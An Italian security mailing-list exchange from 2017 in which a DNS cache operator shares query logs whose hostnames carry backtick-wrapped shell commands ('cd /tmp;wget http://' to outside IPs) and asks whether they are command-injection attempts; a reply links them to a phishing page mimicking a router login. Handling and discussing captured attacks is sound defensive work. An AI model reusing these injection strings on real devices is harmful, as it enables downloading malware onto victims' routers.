Ho provato a seguire il link, dopo un redirect in javascript rimanda ad
una pagina di login che richiama la pagina di login di un router.
Strano. L'ip sembra sia in sud africa.
Io direi che è un tentativo di collezionare password di utenti ignari
che credono di accedere al loro router mentre stanno mandando le proprie
credenziali all'hacker di turno.
Il 14/02/2017 15:25, Lorenzo Mainardi ha scritto:
Buonasera a tutti,
gestisco un server DNS cache per diverse migliaia di utenti broadband e
mi ritrovo nei log delle query di questo tipo:
15:11:14.531518 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9169+ A?
`cd /tmp;wget http://105.226.91.155. (53)
15:11:14.549417 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9170+ A?
`cd /tmp;wget http://105.226.91.155. (53)
15:11:14.567374 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9171+ A?
`cd /tmp;wget http://105.226.91.155. (53)
15:11:17.792996 IP e.f.g.h.11783 > my.dns.cache.only.domain: 212+ A? `cd
/tmp;wget http://36.107.97.237:. (53)
15:11:18.313564 IP a.b.c.e.11080 > my.dns.cache.only.domain: 1069+ A?
`cd /tmp;wget http://84.9.195.97:27. (53)
15:11:26.300024 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1299+ A?
`cd /tmp;wget http://2.186.193.103:. (53)
15:11:26.318653 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1300+ A?
`cd /tmp;wget http://2.186.193.103:. (53)
15:11:26.337361 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1301+ A?
`cd /tmp;wget http://2.186.193.103:. (53)
Che cosa pensate possano essere? Tentativi di command injection?
è la prima volta che mi capita di vedere delle query del genere.
--
LORENZO MAINARDI
________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List
